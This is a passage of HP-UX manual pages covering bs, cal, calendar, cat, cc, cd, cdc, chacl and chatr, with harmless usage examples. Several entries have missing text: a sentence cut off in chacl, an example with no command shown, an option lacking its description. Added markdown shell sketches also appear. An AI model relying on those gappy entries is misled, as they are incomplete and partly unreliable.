pipe), d for directory, b for block special, or c for character special.
Tables
table(name , size )
A table in bs is an associatively accessed, single-dimension array. ‘‘Subscripts’’ (called
keys) are strings (numbers are converted). The name argument must be a bs variable
name (passed as a string). The size argument sets the minimum number of elements to
be allocated.
item(name , i )
key( ) The item function accesses table elements sequentially (in normal use, there is no ord-
erly progression of key values). Where the item function accesses values, the key
function accesses the ‘‘subscript’’ of the previous item call. It fails (or in the absence of
an interrogate operator, returns null) if there was no valid subscript for the previ-
ous item call. The name argument should not be quoted. Since exact table sizes are
not defined, the interrogation operator should be used to detect the end of the
elements in the table. Null is, however, a legal ‘‘subscript’’.
iskey(name , word )
iskey tests whether the key word exists in the table name and returns one for true, zero
for false.
EXTERNAL INFLUENCES
Environment Variables
LC_COLLATE determines the collating sequence used in evaluating regular expressions.
LC_CTYPE determines the characters matched by character class expressions in regular expressions.
If any internationalization variable contains an invalid setting, bs behaves as if all internationalization
variables are set to "C". See environ (5).
EXAMPLES
Using bs as a calculator ($ is the shell prompt):
$ bs
# Distance (inches) light travels in a nanosecond.
186000 * 5280 * 12 / 1e9
11.78496
...
# Compound interest (6% for 5 years on $1,000).
int = .06 / 4
bal = 1000
for i = 1 5*4 bal = bal + bal*int
bal - 1000
346.855007
...
exit
The outline of a typical bs program:
# initialize things:
var1 = 1
open("read", "infile", "r")
...
# compute:
while ?(str = read)
...
# clean up:
close("read")
...
# last statement executed (exit or stop):
exit
# last input line:
run
Input/Output examples:
# Copy file oldfile to file newfile.
open("read", "oldfile", "r")
open("write", "newfile", "w")
...
while ?(write = read)
...
# close "read" and "write":
close("read")
close("write")
# Pipe between commands.
open("ls", "!ls *", "r")
open("pr", "!pr -2 -h ’List’", "w")
while ?(pr = ls) ...
...
# be sure to close (wait for) these:
close("ls")
close("pr")
WARNINGS
The graphics mode (plot ...) is not particularly useful unless the tplot command is available on your
system.
bs is not tolerant of some errors. For example, mistyping a fun declaration is difficult to correct
because a new definition cannot be made without doing a clear. The best solution in such a case is to
start by using the edit command.
SEE ALSO
ed(1), sh(1), access(2), printf(3S), stdio(3S), lang(5), regexp(5).
See Section (3M) for a further description of the mathematical functions.
pow() is used for exponentiation (see exp (3M)).
bs uses the Standard I/O package.
cal(1) cal(1)
NAME
cal - print calendar
SYNOPSIS
cal [ [ month ] year ]
DESCRIPTION
cal prints a calendar for the specified year. If a month is also specified, a calendar just for that month is
printed. If neither is specified, a calendar for the present month is printed. year can be between 1 and
9999. month is a decimal number between 1 and 12. The calendar produced is a Gregorian calendar.
EXTERNAL INFLUENCES
Environment Variables
LANG determines the locale to use for the locale categories when both LC_ALL and the corresponding
environment variable (beginning with LC_) do not specify a locale. LC_TIME determines the format and
contents of the calendar.
TZ determines the timezone used to calculate the value of the current month.
If any internationalization variable contains an invalid setting, cal behaves as if all internationalization
variables are set to "C". See environ (5).
EXAMPLES
The command:
cal 9 1850
prints the calendar for September, 1850 on the screen as follows:
September 1850
S M Tu W Th F S
1 2 3 4 5 6 7
8 9 10 11 12 13 14
15 16 17 18 19 20 21
22 23 24 25 26 27 28
29 30
However, for XPG4 the output looks like the following:
Sep 1850
Sun Mon Tue Wed Thu Fri Sat
1 2 3 4 5 6 7
8 9 10 11 12 13 14
15 16 17 18 19 20 21
22 23 24 25 26 27 28
29 30
WARNINGS
The year is always considered to start in January even though this is historically naive.
Beware that cal 83 refers to the early Christian era, not the 20th century.
STANDARDS CONFORMANCE
cal: SVID2, SVID3, XPG2, XPG3, XPG4
calendar(1) calendar(1)
NAME
calendar - reminder service
SYNOPSIS
calendar [-]
DESCRIPTION
calendar consults the file calendar in the current directory and prints out lines containing today’s or
tomorrow’s date anywhere in the line. On weekends, ‘‘tomorrow’’ extends through Monday.
When a - command-line argument is present, calendar searches for the file calendar in each
user’s home directory, and sends any positive results to the user by mail (see mail (1)). Normally this is
done daily in the early morning hours under the control of cron (see cron (1M)). When invoked by
cron, calendar reads the first line in the calendar file to determine the user’s environment.
Language-dependent information such as spelling and date format (described below) are determined by
the user-specified LANG statement in the calendar file. This statement should be of the form
LANG=language where language is a valid language name (see lang (5)). If this line is not in the
calendar file, the action described in the EXTERNAL INFLUENCES Environment Variable section is
taken.
calendar is concerned with two fields: month and day. A month field can be expressed in three
different formats: a string representing the name of the month (either fully spelled out or abbreviated), a
numeric month, or an asterisk (representing any month). If the month is expressed as a string represent-
ing the name of the month, the first character can be either upper-case or lower-case; other characters
must be lower-case. The spelling of a month name should match the string returned by calling
nl_langinfo() (see nl_langinfo (3C)). The day field is a numeric value for the day of the month.
Month-Day Formats
If the month field is a string, it can be followed by zero or more blanks. If the month field is numeric, it
must be followed by either a slash (/) or a hyphen (-). If the month field is an asterisk (*), it must be fol-
lowed by a slash (/). The day field can be followed immediately by a blank or non-digit character.
Day-Month Formats
The day field is expressed as a numeral. What follows the day field is determined by the format of the
month. If the month field is a string, the day field must be followed by zero or one dot (.) followed by
zero or more blanks. If the month field is a numeral, the day field must be followed by either a slash (/)
or a hyphen (-). If the month field is an asterisk, the day field must be followed by a slash (/).
EXTERNAL INFLUENCES
Environment Variables
LC_TIME determines the format and contents of date and time strings when no LANG statement is
specified in the calendar file.
LANG determines the language in which messages are displayed.
If any internationalization variable contains an invalid setting, calendar behaves as if all
internationalization variables are set to "C". See environ (5).
EXAMPLES
The following calendar file illustrates several formats recognized by calendar :
LANG=en_US.roman8
Friday, May 29th: group coffee meeting
meeting with Boss on June 3.
3/30/87 - quarter end review
4-26 Management council meeting at 1:00 pm
It is first of the month ( */1 ); status report due.
In the following calendar file, dates are expressed according to European English usage:
LANG=en_GB.roman8
On 20 Jan. code review
Jim’s birthday is on the 3. February
30/3/87 - quarter end review
26-4 Management council meeting at 1:00 pm
It is first of the month ( 1/* ); status report due.
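The core of calendar’s date matching can be approximated with grep (a simplified sketch: the real calendar also matches month names, asterisks, and tomorrow’s date; /tmp/calendar.demo is a throwaway file used only for illustration):

```shell
# Build a sample calendar file: one entry dated today (m/d form),
# one entry that can never match a real date.
today=$(date '+%m/%d')
printf '%s - status report due\n99/99 - placeholder entry\n' "$today" \
    > /tmp/calendar.demo

# Print lines mentioning today's date, roughly as calendar(1) would.
grep -F "$today" /tmp/calendar.demo
```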
WARNINGS
To get reminder service, either your calendar must be public information or you must run calendar
from your personal crontab file, independent of any calendar - run systemwide. Note that if you
run calendar yourself, the calendar file need not reside in your home directory.
calendar’s extended idea of ‘‘tomorrow’’ does not account for holidays.
This command is likely to be withdrawn from X/Open standards. Applications using this command might
not be portable to other vendors’ platforms.
AUTHOR
calendar was developed by AT&T and HP.
FILES
calendar
/tmp/cal*
/usr/lbin/calprog to figure out today’s and tomorrow’s dates
/usr/bin/crontab
/etc/passwd
SEE ALSO
cron(1M), nl_langinfo(3C), mail(1), environ(5).
STANDARDS CONFORMANCE
calendar: SVID2, SVID3, XPG2, XPG3
cat(1) cat(1)
NAME
cat - concatenate, copy, and print files
SYNOPSIS
cat [-benrstuv] file ...
DESCRIPTION
cat reads each file in sequence and writes it on the standard output. Thus:
cat file
prints file on the default standard output device;
cat file1 file2 > file3
concatenates file1 and file2, and places the result in file3.
If - appears as a file argument, cat uses standard input. To combine standard input and other files,
use a combination of - and file arguments.
Options
cat recognizes the following options:
-b Omit line numbers from blank lines when -n option is specified. If this option is specified, the
-n option is automatically selected.
-e Print a $ character at the end of each line (prior to the new-line). If this option is specified,
the -v option is automatically selected.
-n Display output lines preceded by line numbers, numbered sequentially from 1.
-r Replace multiple consecutive empty lines with one empty line, so that there is never more than
one empty line between lines containing characters.
-s Silent option. cat suppresses error messages about non-existent files, identical input and
output, and write errors. Normally, input and output files cannot have identical names unless
the file is a special file.
-t Print each tab character as ˆI and form feed character as ˆL. If this option is specified, the
-v option is automatically selected.
-u Do not buffer output (handle character-by-character). Normally, output is buffered.
-v Cause non-printing characters (with the exception of tabs, new-lines and form-feeds) to be
printed visibly. Control characters are printed using the form ˆX (Ctrl-X), and the DEL char-
acter (octal 0177) is printed as ˆ? (see ascii (5)). Single-byte control characters whose most
significant bit is set, are printed using the form M-ˆx, where x is the character specified by the
seven low order bits. All other non-printing characters are printed as M-x, where x is the
character specified by the seven low order bits. This option is influenced by the LC_CTYPE
environment variable and its corresponding code set.
EXTERNAL INFLUENCES
Environment Variables
LANG provides a default value for the internationalization variables that are unset or null. If LANG is
unset or null, the default value of "C" (see lang (5)) is used. If any of the internationalization variables
contains an invalid setting, cat behaves as if all internationalization variables are set to "C". See
environ (5).
RETURN VALUE
Exit values are:
0 Successful completion.
>0 Error condition occurred.
EXAMPLES
To create a zero-length file, use any of the following:
cat /dev/null > file
cp /dev/null file
touch file
The following prints ˆI for all the occurrences of tab character in file1
cat -t file1
To suppress error messages about files that do not exist, use:
cat -s file1 file2 file3 > file
If file2 does not exist, the above command concatenates file1 and file3 without reporting an error for file2 .
The result is the same if the -s option is not used, except that cat displays the error message.
To view non-printable characters in file2 , use:
cat -v file2
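The -t and -n options can be tried directly from a pipeline (shown here with printf-generated input; this assumes a cat implementation that supports these options, which HP-UX and GNU cat both do):

```shell
# -t prints each tab as ^I (two characters: caret, I).
printf 'a\tb\n' | cat -t

# -n numbers output lines sequentially from 1.
printf 'first\nsecond\n' | cat -n
```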
WARNINGS
Command formats such as
cat file1 file2 > file1
overwrite the data in file1 before the concatenation begins, thus destroying the file. Therefore, be careful
when using shell special characters.
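A safe alternative (a sketch assuming a writable /tmp) concatenates into a temporary file and renames it only after cat succeeds:

```shell
# Set up two sample files.
mkdir -p /tmp/cat_demo && cd /tmp/cat_demo
printf 'one\n' > file1
printf 'two\n' > file2

# Concatenate into a temporary file, then replace file1 only on success.
cat file1 file2 > file1.tmp && mv file1.tmp file1
cat file1
```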
SEE ALSO
cp(1), more(1), pg(1), pr(1), rmnl(1), ssp(1).
STANDARDS CONFORMANCE
cat: SVID2, SVID3, XPG2, XPG3, XPG4, POSIX.2
cc_bundled(1) cc_bundled(1)
(Bundled C Compiler - Limited Functionality)
NAME
cc - bundled C compiler
SYNOPSIS
cc [options ] files
DESCRIPTION
This manual page describes the Bundled C compiler. cc invokes the HP-UX bundled C compiler. C
source code is compiled directly to object code.
The command uses the ctcom (Itanium(R)-based systems) or ccom (PA-RISC, Precision Architecture)
compiler for preprocessing, syntax and type checking, as well as for code generation.
cc accepts several types of arguments as files :
Arguments of the form -lx cause the linker to search the library libx.sl (PA-RISC) or libx.a in an
attempt to resolve currently unresolved external references. Because a library is searched when its name
is encountered, placement of a -l is significant. If a file contains an unresolved external reference, the
library containing the definition should be placed after that file.
Other Suffixes
All other arguments, such as names ending with .o, .a, or .so, are taken to be relocatable object
files to be included in the link. A directory for temporary files can be specified, overriding the
default directory /var/tmp.
If the system cannot assure that location zero acts as if it was initialized to zero or is locked at zero,
the hardware should act as if the -z flag is always set.
EXTERNAL INFLUENCES
Environment Variables
DIAGNOSTICS
The diagnostics produced by the compiler itself are intended to be self-explanatory. Occasional messages
may be produced by the assembler or the link editor.
If any errors occur before cc is completed, a non-zero value is returned. Otherwise, zero is returned.
DEPENDENCIES
file.c C input file
file.i previously preprocessed cc input file
file.o object file
file.so shared library, created with -b on Itanium-based systems
file.sl shared library, created with -b on PA-RISC
a.out linked executable output file
/var/tmp/* temporary files used by the compiler (Itanium-based systems)
/var/tmp/ctm* temporary files used by the compiler (PA-RISC)
/usr/ccs/bin/cc C driver
/usr/ccs/bin/cc_bundled C driver
/usr/ccs/lbin/ctcom C Compiler (Itanium-based systems)
/usr/ccs/lbin/ccom C Compiler (PA-RISC)
/usr/ccs/lbin/cpp preprocessor
/usr/lib/nls/msg/$LANG/aCC.cat
C compiler message catalog (Itanium-based systems)
/usr/lib/nls/msg/$LANG/cc.cat
C compiler message catalog (PA-RISC)
/usr/ccs/bin/as assembler, see as (1)
/usr/ccs/bin/ld link editor, see ld(1)
/usr/ccs/lib/crt0.o Runtime startup (PA-RISC)
/usr/include Standard directory for #include files
Other Libraries
/usr/lib/libc.sl Standard C library (shared version), see HP-UX Reference Section (3). (PA-RISC)
/usr/lib/hpux32/libm.a Math Library (Itanium-based system)
/usr/lib/hpux64/libm.a Math Library (Itanium-based systems)
/usr/lib/libm.a Math Library (PA-RISC)
/usr/lib/hpux32/libdld.so Dynamic loader library (Itanium-based systems)
/usr/lib/hpux64/libdld.so Dynamic loader library (Itanium-based systems)
/usr/lib/libdld.sl Dynamic loader library (PA-RISC)
/usr/lib/hpux32/dld.so Dynamic loader (Itanium-based systems)
/usr/lib/hpux64/dld.so Dynamic loader (Itanium-based systems)
/usr/lib/dld.so Dynamic loader (PA-RISC)
SEE ALSO
Online help
The online help can be displayed using a default HTML browser, or you can invoke your own HTML
browser with the URL file:/opt/ansic/html/$LANG/guide/index.htm (Itanium-based sys-
tems) or file:/opt/ansic/html/guide/$LANG/index.htm (PA-RISC)
Other topics available are: Compiler Pragmas, Floating Installation and Implementation Defined aspects
of the compiler.
Information is also available on the web at:
System Tools
as (1) translate assembly code to machine code
cpp (1) invoke the C language preprocessor
cc(1) C compiler
ld(1) invoke the link editor
Miscellaneous
strip (1) strip symbol and line number information from an object file
crt0 (3) execution startup routine
end(3C) symbol of the last locations in program
exit (2) termination of a process
cd(1) cd(1)
NAME
cd - change working directory
SYNOPSIS
cd [ directory ]
DESCRIPTION
If directory is not specified, the value of shell parameter HOME is used as the new working directory. If
directory specifies a complete path starting with /, ., or .., directory becomes the new working direc-
tory. If neither case applies, cd tries to find the designated directory relative to one of the paths
specified by the CDPATH shell variable. CDPATH has the same syntax as, and similar semantics to, the
PATH shell variable. cd must have execute (search) permission in directory .
cd exists only as a shell built-in command because a new process is created whenever a command is
executed, making cd useless if written and processed as a normal system command. Moreover, different
shells provide different implementations of cd as a built-in utility. Features of cd as described here
may not be supported by all the shells. Refer to individual shell manual entries for differences.
If cd is called in a subshell or a separate utility execution environment such as:
find . -type d -exec cd {} \; -exec foo {} \;
(which invokes foo on accessible directories) cd does not affect the current directory of the caller’s
environment. Another usage of cd as a stand-alone command is to obtain the exit status of the com-
mand.
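The subshell behavior is easy to verify directly (a sketch; /tmp is only an example target directory):

```shell
# cd inside ( ... ) changes only the subshell's working directory.
before=$(pwd)
( cd /tmp && pwd )           # the subshell reports its new directory
after=$(pwd)                 # the caller's directory is untouched
[ "$before" = "$after" ] && echo unchanged
```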
EXTERNAL INFLUENCES
International Code Set Support
Single- and multi-byte character code sets are supported.
Environment Variables
The following environment variables affect the execution of cd:
HOME The name of the home directory, used when no directory operand is specified.
CDPATH A colon-separated list of directory pathnames in which cd searches for directory;
the working directory is set to the first matching directory found. An empty string
in place of a directory pathname represents the current directory. If CDPATH is
not set, it is treated as if it were an empty string.
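A short demonstration of the CDPATH search (a sketch assuming a POSIX shell and a writable /tmp; /tmp/cdpath_demo is a throwaway directory). When cd resolves its operand through CDPATH, it writes the resulting directory to standard output:

```shell
# Create a directory reachable only through CDPATH from here.
mkdir -p /tmp/cdpath_demo/proj

# With CDPATH set, a bare "cd proj" searches /tmp/cdpath_demo first.
CDPATH=/tmp/cdpath_demo
cd proj                      # prints /tmp/cdpath_demo/proj
pwd
unset CDPATH
```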
EXAMPLES
Change the current working directory to the HOME directory from any location in the file system:
cd
Change to new current working directory foo residing in the current directory:
cd foo
or
cd ./foo
Change to directory foobar residing in the current directory’s parent directory:
cd ../foobar
Change to the directory whose absolute pathname is /usr/local/lib/work.files:
cd /usr/local/lib/work.files
Change to the directory proj1/schedule/staffing/proposals relative to home directory:
cd $HOME/proj1/schedule/staffing/proposals
RETURN VALUE
Upon completion, cd exits with one of the following values:
0 The directory was successfully changed.
SEE ALSO
csh(1), pwd(1), ksh(1), sh-posix(1), sh(1), chdir(2).
STANDARDS CONFORMANCE
cd: SVID2, SVID3, XPG2, XPG3, XPG4, POSIX.2
cdc(1) cdc(1)
NAME
cdc - change the delta commentary of an SCCS delta
SYNOPSIS
cdc -r SID [-m[ mrlist ] ] [-y[ comment ] ] files
DESCRIPTION
The cdc command changes the delta commentary, for the SID specified by the -r option, of each
named SCCS file.
Delta commentary is defined to be the Modification Request (MR) and comment information normally
specified via the delta (1) command (-m and -y options).
If a directory is named, cdc behaves as if each file in the directory were specified as a named file, except
that non-SCCS files (last component of the path name does not begin with s.) and unreadable files are
silently ignored. If a name of - is given, the standard input is read (see WARNINGS); each line of the
standard input is taken to be the name of an SCCS file to be processed.
Options
Arguments to cdc, which can appear in any order, consist of option arguments and file names.
All of the described option arguments apply independently to each named file:
-rSID Used to specify the SCCS IDentification (SID) string of a delta for which the delta
commentary is to be changed.
-m[mrlist] If the SCCS file has the v option set (see admin (1)), a list of MR numbers to be
added and/or deleted in the delta commentary of the SID specified by the -r option
may be supplied. A null MR list has no effect.
MR entries are added to the list of MRs in the same manner as that of delta (1). To
delete an MR, precede the MR number with the character ! (see EXAMPLES). If the
MR to be deleted is currently in the list of MRs, it is removed and changed into a
‘‘comment’’ line. A list of all deleted MRs is placed in the comment section of the
delta commentary, preceded by a comment line stating that they were deleted (see also the -y option).
MRs in a list are separated by blanks and/or tab characters. An unescaped new-line
character terminates the MRs list.
Note that if the v option has a value (see admin (1)), it is treated as the name of a
program (or shell procedure) that validates the correctness of the MR numbers. If a
non-zero exit status is returned from the MR number validation program, cdc ter-
minates and the delta commentary remains unchanged.
-y[comment] Arbitrary text used to replace the comment or comments already existing for the
delta specified by the -r option. Previous comments are kept and preceded by a
comment line stating that they were changed. A null comment has no effect.
If -y is not specified and the standard input is a terminal, the prompt comments?
is issued on the standard output before standard input is read; if standard input is
not a terminal, no prompt is issued. An unescaped new-line character terminates
the comment text.
The exact permissions necessary to modify the SCCS file are documented in get (1). Simply stated, they
are either:
• If you made the delta, you can change its delta commentary, or
• If you own the file and directory, you can modify the delta commentary.
EXTERNAL INFLUENCES
Environment Variables
LANG determines the language in which messages are displayed.
DIAGNOSTICS
Use sccshelp (1) for explanations.
EXAMPLES
Add bl78-12345 and bl79-00001 to the MR list, remove bl77-54321 from the MR list, and add the
comment trouble to delta 1.6 of s.file:
cdc -r1.6 -m"bl78-12345 !bl77-54321 bl79-00001" -ytrouble s.file
The following does the same thing:
cdc -r1.6 s.file
MRs? !bl77-54321 bl78-12345 bl79-00001
comments? trouble
WARNINGS
If SCCS file names are supplied to the cdc command via the standard input (- on the command line), the
-m and -y options must also be used.
FILES
x-file See delta (1).
z-file See delta (1).
SEE ALSO
admin(1), delta(1), get(1), sccshelp(1), prs(1), sccsfile(4), rcsfile(4), acl(5), rcsintro(5).
chacl(1) chacl(1)
NAME
chacl - add, modify, delete, copy, or summarize access control lists (ACLs) of files
SYNOPSIS
/usr/bin/chacl acl file ...
chacl -r acl file ...
chacl -d aclpatt file ...
chacl -f fromfile tofile ...
chacl -z|-Z|-F file ...
DESCRIPTION
chacl extends the capabilities of chmod(1) by enabling the user to grant or restrict file access to addi-
tional specific users and/or groups. Traditional file access permissions, set when a file is created, grant or
restrict access to the file’s owner, group, and other users. These file access permissions (e.g., rwxrw-r--)
are mapped into three base access control list entries: one entry for the file’s owner (u.%, mode), one for
the file’s group (%.g, mode), and one for other users (%.%, mode).
chacl enables a user to designate up to thirteen additional sets of permissions (called optional access
control list (ACL) entries) which are stored in the access control list of the file.
To use chacl , the owner (or superuser) constructs an acl , a set of (user.group, mode) mappings to associ-
ate with one or more files. A specific user and group can be referred to by either name or number; any
user (u), group (g), or both can be referred to with a % symbol, representing any user or group. The @
symbol specifies the file’s owner or group.
Read, write, and execute/search (rwx) modes are identical to those used by chmod; symbolic operators
(op) add (+), remove (-), or set (=) access rights. The entire acl should be quoted if it contains whitespace
or special characters. Although two variants for constructing the acl are available (and fully explained in
acl (5)), the following syntax is suggested:
entry [, entry ] ...
where the syntax for an entry is
u.g op mode[ op mode ] ...
By default, chacl modifies existing ACLs. It adds ACL entries or modifies access rights in existing ACL
entries. If acl contains an ACL entry already associated with a file, the entry’s mode bits are changed to
the new value given, or are modified by the specified operators. If the file’s ACL does not already contain
the specified entry, that ACL entry is added. chacl can also remove all access to files. Giving it a null
acl argument means either ‘‘no access’’ (when using the -r option) or ‘‘no changes.’’
For a summary of the syntax, run chacl without arguments.
If file is specified as -, chacl reads from standard input.
Options
chacl recognizes the following options:
-r Replace old ACLs with the given ACL. All optional ACL entries are first deleted from the
specified files’ ACLs, their base permissions are set to zero, and the new ACL is applied.
If acl does not contain an entry for the owner (u.%), the group (%.g), or other (%.%)
users of a file, that base ACL entry’s mode is set to zero (no access). The command affects
all of the file’s ACL entries, but does not change the file’s owner or group ID.
In chmod(1), the ‘‘modify’’ and ‘‘replace’’ operations are distinguished by the syntax
(string or octal value). There is no corollary for ACLs because they have a variable
number of entries. Hence chacl modifies specific entries by default, and optionally
replaces all entries.
-d Delete the specified entries from the ACLs on all specified files. The aclpatt argument can
be an exact ACL or an ACL pattern (see acl (5)). chacl -d updates each file’s ACL only
if entries are deleted from it.
If you attempt to delete a base ACL entry from any file, the entry remains but its access
mode is set to zero (no access). If you attempt to delete a non-existent ACL entry from a
file (that is, if an ACL entry pattern matches no ACL entry), chacl informs you of the
EXTERNAL INFLUENCES
Environment Variables
LANG determines the language in which messages are displayed.
If LANG is not specified or is set to the empty string, a default of "C" (see lang (5)) is used instead of
LANG. If any internationalization variable contains an invalid setting, chacl behaves as if all interna-
tionalization variables are set to "C". See environ (5).
RETURN VALUE
If chacl succeeds, it returns a value of zero.
If chacl encounters an error before it changes any file’s ACL, it prints an error message to standard
error and returns 1. Such errors include invalid invocation, invalid syntax of acl (aclpatt ), a given user
name or group name is unknown, or inability to get an ACL from fromfile with the -f option.
If chacl cannot execute the requested operation, it prints an error message to standard error, contin-
ues, and later returns 2. This includes cases when a file does not exist, a file’s ACL cannot be altered,
more ACL entries would result than are allowed, or an attempt is made to delete a non-existing ACL entry.
EXAMPLES
The following command adds read access for user jpc in any group, and removes write access for any
user in the files’ groups, for files x and y.
chacl "jpc.%+r, %.@-w" x y
This command replaces the ACL on the file open as standard input and on file test with one which only
allows the file owner read and write access.
WARNINGS
An ACL string cannot contain more than 16 unique entries, even though converting @ symbols to user or
group names and combining redundant entries might result in fewer than 16 entries for some files.
DEPENDENCIES
chacl will fail when the target file resides on a file system which does not support ACLs.
NFS
Only the -F option is supported on remote files.
AUTHOR
chacl was developed by HP.
SEE ALSO
chmod(1), getaccess(1), lsacl(1), getacl(2), setacl(2), acl(5), glossary(9).
chatr(1) chatr(1)
NAME
chatr - change program’s internal attributes
SYNOPSIS
Format 1: for files with a single text segment and a single data segment
chatr [-s] [-z] [-Z] [-l library ] [-B mode ] [+as mode ] [+b flag ] [+cd flag ] [+ci flag ]
[+dbg flag ] [+es flag ] [+gst flag ] [+gstsize size ] [+id flag ] [+k flag ] [+l library ]
[+md flag ] [+mergeseg flag ] [+mi flag ] [+o flag ] [+pd size ] [+pi size ] [+s flag ]
[+z flag ] [+I flag ] file ...
Options
-l library Indicate that the specified shared library is subject to run-time path lookup if directory
path lists are provided (see +s and +b).
-s Perform its operation silently.
-z Enable run-time dereferencing of null pointers to produce a SIGSEGV signal. (This is
the complement of the -Z option.)
-B mode Select run-time binding behavior mode of a program using shared libraries. You must
specify one of the binding modes immediate or deferred. See the HP-UX Linker
and Libraries User’s Guide for a description of binding modes.
-Z Disable run-time dereferencing of null pointers. (This is the complement of the -z
option.)
+as mode The program should have been built with the -N compiler option to
ensure that the text and data segments are contiguous.
+b flag Control whether the embedded path list stored in the program can be used to locate
shared libraries at run time. See the +s option. You can use the +b option to enable
the embedded path for filter libraries.
+c flag (Format 2 only.) Enable or disable the code bit for a specified segment. If this is enabled,
it is denoted by the c flag for the segment listing in the chatr output.
+cd flag Enable or disable the code bit for the file’s data segment(s). If this is enabled, it is
denoted by the c flag for the segment listing in the chatr output.
+ci flag Enable or disable the code bit for the file’s text segments(s). If this is enabled, it is
denoted by the c flag for the segment listing in the chatr output.
+dbg flag Enable or disable the ability to run a program, and, after it is running, attach to it with a
debugger and set breakpoints in its dependent shared libraries.
+dz flag (Format 2 only.) Enable or disable lazy swap allocation for dynamically allocated seg-
ments (such as the stack or heap).
+es flag Control the ability of user code to execute from stack with the flag values, enable and
disable. See the Restricting Execute Permission on Stacks section below for additional
information related to security issues.
+gst flag Control whether the global symbol table hash mechanism is used to look up values of
symbol import/export entries. The two flag values, enable and disable, respectively
enable and disable use of the global symbol table hash mechanism. The default is dis-
able.
+gstsize size
Request a particular hash array size using the global symbol table hash mechanism. The
value can vary between 1 and MAXINT. The default value is 1103. Use this option with
+gst enable. This option works on files linked with the +gst option.
+id flag Controls the preference of physical memory for the data segment. This is only important
on ccNUMA (Cache Coherent Non-Uniform Memory Architecture) systems. The flag
value may be either enable or disable. When enabled, the data segment will use inter-
leaved memory. When disabled (the default), the data segment will use cell local
memory. This behavior will be inherited across a fork(), but not an exec().
For more information regarding ccNUMA, see pstat_getlocality(2).
+k flag Request kernel assisted branch prediction. The flags enable and disable turn this
request on and off, respectively.
+l library Indicate that the specified shared library is not subject to run-time path lookup if direc-
tory path lists are provided (see +s and +b).
+m flag (Format 2 only.) Enable or disable the modification bit for a specified segment. If this is
enabled, it is denoted by the m flag for the segment listing in the chatr output.
+md flag Enable or disable the modification bit for the file’s data segment(s). If this is enabled, it
is denoted by the m flag for the segment listing in the chatr output.
+mergeseg flag
Enable or disable the shared library segment merging features. When enabled, all data
segments of shared libraries loaded at program startup are merged into a single block.
Data segments for each dynamically loaded library will also be merged with the data seg-
ments of its dependent libraries. Merging of these segments increases run-time perfor-
mance by allowing the kernel to use larger size page table entries.
+mi flag Enable or disable the modification bit for the file’s text segment(s). If this is enabled, it is
denoted by the m flag for the segment listing in the chatr output.
+o flag Enable or disable the DF_ORIGIN flag to control use of $ORIGIN. When enabled, the
loader uses this path for all occurrences of $ORIGIN in the dependent libraries.
If there are no occurrences of $ORIGIN, you should disable the DF_ORIGIN flag, to
avoid calculating the absolute path. By default, if $ORIGIN is not present, the
DF_ORIGIN flag is disabled.
+p size (Format 2 only.) Set the page size for a specified segment.
+pd size Request a particular virtual memory page size that should be used for data.
+pi size Request a particular virtual memory page size that should be used for text (instructions).
See the +pd option for additional information.
+r flag Request static branch prediction when executing this program. The flags enable and
disable turn this request on and off, respectively. If this is enabled, it is denoted by
the r flag for the segment listing in the chatr output.
+s flag Control whether the directory path lists specified with the LD_LIBRARY_PATH and
SHLIB_PATH environment variables can be used to locate shared libraries needed by the
program. The two flag values, enable and disable, respectively enable and disable
use of the environment variables. If both +s and +b are used, their relative order on the
command line indicates which path list will be searched first. See the +b option.
+sa address (Format 2 only.) Specify a segment using an address for a set of attribute modifications.
+sall (Format 2 only.) Use all segments in the file for a set of attribute modifications.
+si index (Format 2 only.) Specify a segment using a segment index number for a set of attribute
modifications.
+z flag Enable or disable lazy swap on all data segments (using Format 1) or on a specific
segment (using Format 2). The flags enable and disable turn this request on or off,
respectively. May not be used with non-data segments.
+I flag Enable or disable dynamic instrumentation by /opt/langtools/bin/caliper. If
enabled, the dynamic loader (see dld.so (5)) will automatically invoke caliper upon
program execution to collect profile information.
An alternate method is setting the kernel tunable parameter, executable_stack, to set a system-
wide default for whether stacks are executable. Setting the executable_stack parameter to 1 (one)
with sam (see sam(1M)) tells the HP-UX kernel to allow programs to execute on the program stack(s).
Use this setting if compatibility with older releases is more important than security. Setting the
executable_stack parameter to 0 (zero), the recommended setting, is appropriate if security is more
important than compatibility. This setting significantly improves system security with minimal, if any,
negative effects on legitimate applications.
Combinations of these settings may be appropriate for many applications. For example, to achieve a
restrictive system default while still letting specific applications run correctly, set
executable_stack to 0, and run chatr +es enable on the specific binaries that need to execute
code from their stack(s). These binaries can be easily identified when they are executed, because they
will print error messages referring to this manual page.
The possible settings for executable_stack are as follows:
executable_stack = 0
A setting of 0 causes stacks to be non-executable and is strongly preferred from a security per-
spective.
executable_stack = 1 (default)
A setting of 1 (the default value) causes all program stacks to be executable, and is safest from
a compatibility perspective but is the least secure setting for this parameter.
executable_stack = 2
A setting of 2 causes all program stacks to be executable, but a warning message is displayed
when a program executes code from its stack.
The following table shows the effect of combinations of chatr +es and
executable_stack when executing from the program’s stack. Running chatr +es disable relies
solely on the setting of the executable_stack kernel tunable parameter when deciding whether or
not to grant execute permission for stacks and is equivalent to not having run chatr +es on the binary.
chatr +es                      executable_stack   Action
enable                         1                  program runs normally
disable or chatr is not run    1                  program runs normally
enable                         0                  program runs normally
disable or chatr is not run    0                  program is killed
enable                         2                  program runs normally
disable or chatr is not run    2                  program runs normally, with warning displayed
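The decision table above can be encoded as a small sketch. This is purely illustrative; the function name and the (runs, warning) return convention are mine, not part of HP-UX:

```python
def stack_exec_allowed(chatr_es, executable_stack):
    """Model the chatr +es / executable_stack table: return
    (program_runs, warning_displayed) when a program executes from its
    stack. chatr_es is 'enable', 'disable', or None (chatr was not run)."""
    if chatr_es == 'enable':
        return True, False                 # +es enable always permits it
    if executable_stack == 0:
        return False, False                # program is killed
    return True, executable_stack == 2     # setting 2 runs with a warning
```

For example, a binary that was never touched by chatr is killed under executable_stack = 0 but runs with a warning under executable_stack = 2.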
RETURN VALUE
chatr returns zero on success. If the command line content is syntactically incorrect, or one or more of
the specified files cannot be acted upon, chatr returns information about the files whose attributes
could not be modified. If no files are specified, chatr returns decimal 255.
Illegal options
If you use an illegal option, chatr returns the number of non-option words present after the first illegal
option. The following example returns 4:
chatr +b enable +xyz enable +mno enable +pqr enable file
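The counting rule above can be sketched as follows. This is a simplified model (hypothetical helper, not part of chatr) that assumes every option begins with '+' and any other argument counts as a word:

```python
def illegal_option_return(args, valid_options):
    """Return chatr's exit value for an illegal option: the number of
    non-option words appearing after the first illegal option."""
    for i, arg in enumerate(args):
        if arg.startswith('+') and arg not in valid_options:
            return sum(1 for w in args[i + 1:] if not w.startswith('+'))
    return 0
```

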